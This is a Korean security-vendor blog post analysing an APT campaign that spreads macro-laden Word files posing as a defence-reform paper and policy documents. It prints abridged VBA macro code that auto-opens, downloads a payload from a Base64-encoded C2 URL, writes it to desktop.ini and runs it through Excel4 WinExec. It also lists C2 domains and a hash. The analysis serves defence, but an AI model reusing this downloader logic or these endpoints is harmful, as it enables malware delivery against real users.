특정 논문의 악성 워드 문서를 이용한 APT 공격

ASEC 분석팀은 지난 9월 특정 논문을 이용한 악성 워드 문서가 유포됨을 확인하였다. 확인된 파일은 “경영혁신이론으로 본 국방개혁의 방향.doc” 명으로 유포되고 있으며 내부에 악성 매크로가 포함되어있다. 내부 매크로 코드는 기존 공유되었던 아래의 파일들과 유사한 형태로 모두 동일한 공격자의 소행으로 추정된다.

  • 사례비지급 의뢰서(양식).doc  (6월 9일 ASEC블로그)
  • [** 하계학술대회]_양력.doc  (6월 30일 ASEC블로그)
  • 경영혁신이론으로 본 국방개혁의 방향.doc (9/15)
  • 2 중국의 대외정책과 미중관계 전망_정상기.dotm (9/19)
  • 극동문제연구소 나우만 재단 학술회의 기획안_발송용 (10/12)

9월 유포가 확인된 워드 문서의 내용은 실제 <경영혁신이론으로 본 국방개혁의 방향: 군 구조 및 전력체계 개혁을 중심으로> 논문과 동일한 내용으로 구성되어있다. 해당 논문은 이전 북한 연관 그룹 추정 PDF 문서를 이용한 APT 공격’ 게시글에서 언급된 ‘05_64-1 정연봉경영혁신이론으로 본 국방개혁의 방향수정.pdf’ 와 동일한 파일명인것으로 미루어보아 해당 공격자가 동일한 논문으로 다양한 형태의 악성코드를 제작하는 것으로 보인다.

그림1. 워드 문서 내부

파일 실행 시 내부에 포함된 악성 매크로가 실행되며, 해당 매크로 코드는 ‘하계학술대회 약력 서식파일로 위장한 워드 악성코드 유포 중’ 게시글에서 소개한 악성 워드 문서의 매크로와 동일하다. 최근 확인된 ‘경영혁신이론으로 본 국방개혁의 방향.doc’ 워드 파일에 존재하는 매크로 코드는 아래와 같다.

Dim qazwsx   As Integer

Function sfjksfdgasdfhefgh(data)
On Error Resume Next
     sfjksfdgasdfhefgh = afghhha(data)
End Function

<중략>

Sub AutoOpen()
On Error Resume Next
asfwqfasfsdafas
qazwsx = 0
ujmikl
End Sub

Function ujmikl()
 On Error Resume Next
If (qazwsx = 0) Then
    <중략>
        ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
        
        Set wob = CreateObject("wscript.shell")
        drl = sfjksfdgasdfhefgh("[base64로 인코딩된 C2 주소]")
        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
        WinHttpReq.Open "GET", drl, False
        WinHttpReq.send
        
        If WinHttpReq.Status = 200 Then
            gjhmksfghsdfgs ini, sfjksfdgasdfhefgh(WinHttpReq.responseText)
            
            
            Set ExcelApp = CreateObject("Excel.Application")
            str9 = sfjksfdgasdfhefgh("Y2FsbCgia2VybmVsMzIiLCAiV2luRXhlYyIsICJKRkoiLCAid3NjcmlwdCAvL2U6dmJzY3JpcHQgLy9iICIi") // call("kernel32", "WinExec", "JFJ", "wscript //e:vbscript //b ""
            str11 = sfjksfdgasdfhefgh("IiIiLCA1KQ")
            str11 = Left$(str11, InStr(str11, vbNullChar) - 1)
            ini = Replace(ini, "\", "\\")
            cmd = str9 + ini + str11
            api = ExcelApp.ExecuteExcel4Macro(cmd)
            Sleep 2000
            DeleteFileA ini
        End If
        qazwsx = 1
End If
   
End Function

매크로 코드 내부에는 Base64로 인코딩된 C2 주소가 존재한다. 경영혁신이론으로 본 국방개혁의 방향.doc 파일에서는 hxxp://n4028chu.mywebcommunity.org/d.php에 접속하여 받아온 데이터를 %APPDATA%\desktop.ini 파일에 저장 및 실행한다.

해당 유형의 악성코드는 아래와 같이 다양한 파일명으로 유포되고 있다.

  • 2 중국의 대외정책과 미중관계 전망_정상기.dotm (9/19)
  • 극동문제연구소 나우만 재단 학술회의 기획안_발송용 (10/12)

위 파일들 모두 동일한 악성 매크로를 포함하고 있으며, 아래와 같이 ‘경영혁신이론으로 본 국방개혁의 방향.doc’ 의 매크로 코드에 키 입력에 의해 행위가 발현될 수 있도록 하는 코드가 추가된 워드 문서도 존재한다. 추가된 코드 이외에 변수명, 함수명 등은 모두 동일하다.

Dim qazwsx   As Integer

Function sfjksfdgasdfhefgh(data)
On Error Resume Next
     sfjksfdgasdfhefgh = afghhha(data)
End Function

<중략>
Function ujmikl()
 On Error Resume Next
If (qazwsx = 0) Then
<중략>
        ini = ughjesrh56hdsf(26) & "\de" & "sk" & "to" & "p.ini"
        
        Set wob = CreateObject("wscript.shell")
        drl = sfjksfdgasdfhefgh("[base64로 인코딩된 C2 주소]")
        Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
        WinHttpReq.Open "GET", drl, False
        WinHttpReq.send
<중략>
Sub FLL()

    Selection.TypeText Text:="a"
   ujmikl
End Sub
Sub G9W()

    Selection.TypeText Text:="b"
   ujmikl
End Sub
Sub GEA()

    Selection.TypeText Text:="c"
   ujmikl
End Sub
<생략>

아래는 동일한 매크로를 포함하여 유포되는 악성 워드 문서에서 확인된 C2 주소이다.

  • hxxp://0knw2300.mypressonline[.]com/d.php
  • hxxp://hanjutour.atwebpages[.]com/d.php
  • hxxp://n4028chu.atwebpages[.]com/d.php
  • hxxp://23000knw.mypressonline[.]com/d.php

위와 같이 악성 워드 문서를 이용한 공격은 꾸준히 이루어지고 있다. 해당 유형의 악성 문서는 파일 내부에 실제 논문의 내용 등을 포함하고 있어사용자가 악성 파일 임을 인지하기 어렵기 때문에 각별한 주의가 필요하다. 출처가 불분명한 파일은 실행을 자제하고 매크로 실행을 지양해야한다.

현재 V3에서는 해당 악성코드를 아래와 같이 탐지 중이다.

[파일 진단]

  • Downloader/DOC.Agent
  • Downloader/DOC.Generic.S1677

[IOC]

  • 5eb09dd7aafdd5af5a8396497f99e0e7
  • hxxp://n4028chu.mywebcommunity.org/d.php
  • hxxp://0knw2300.mypressonline[.]com/d.php
  • hxxp://hanjutour.atwebpages[.]com/d.php
  • hxxp://n4028chu.atwebpages[.]com/d.php
  • hxxp://23000knw.mypressonline[.]com/d.php

[관련 게시글]

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:,

0 0 votes
별점 주기
guest
1 댓글
Inline Feedbacks
View all comments
trackback

[…] 漏洞 Vulnerability CVE-2021-32609: Apache Superset XSS漏洞安全更新 https://seclists.org/oss-sec/2021/q4/34 CVE-2021-21796: Nitro Pro PDF UAF漏洞安全更新 https://talosintelligence.com/vulnerability_reports/TALOS-2021-1265 安全事件 Security Incident 以色列一家医院首次遭到重大勒索袭击 https://securityaffairs.co/wordpress/123350/hacking/israeli-hospital-ransomware-attack.html DocuSign网络钓鱼活动的目标是低级别员工 https://www.bleepingcomputer.com/news/security/docusign-phishing-campaign-targets-low-ranking-employees/ 厄瓜多尔的比钦查银行在遭受网络攻击后尚未恢复 https://securityaffairs.co/wordpress/123465/cyber-crime/ecuadors-banco-pichincha-cyberattack.html MirrorBlast活动的目标是使用宏的金融部门 https://www.databreachtoday.com/mirrorblast-campaign-targets-finance-sector-using-macros-a-17745 AtomSilo勒索软件进入双重勒索联盟 https://www.zscaler.com/blogs/security-research/atomsilo-ransomware-enters-league-double-extortion 美国将价值52亿美元的比特币交易与勒索软件挂钩 https://www.bleepingcomputer.com/news/security/us-links-52-billion-worth-of-bitcoin-transactions-to-ransomware/ 密苏里州起诉泄露数据的黑客 https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/ APT-C-48(CNC)组织攻击利用pub文件攻击活动分析 https://mp.weixin.qq.com/s/XbKjW7B2VrM877wBTRWr4g Operation EICAR(APT-Q-28):针对证券金融行业的定向猎杀活动 https://mp.weixin.qq.com/s/F9fJCDeZZWlWDeyqpV_ltw 使用特定论文分发恶意文档的APT攻击活动 https://asec.ahnlab.com/ko/27760/ […]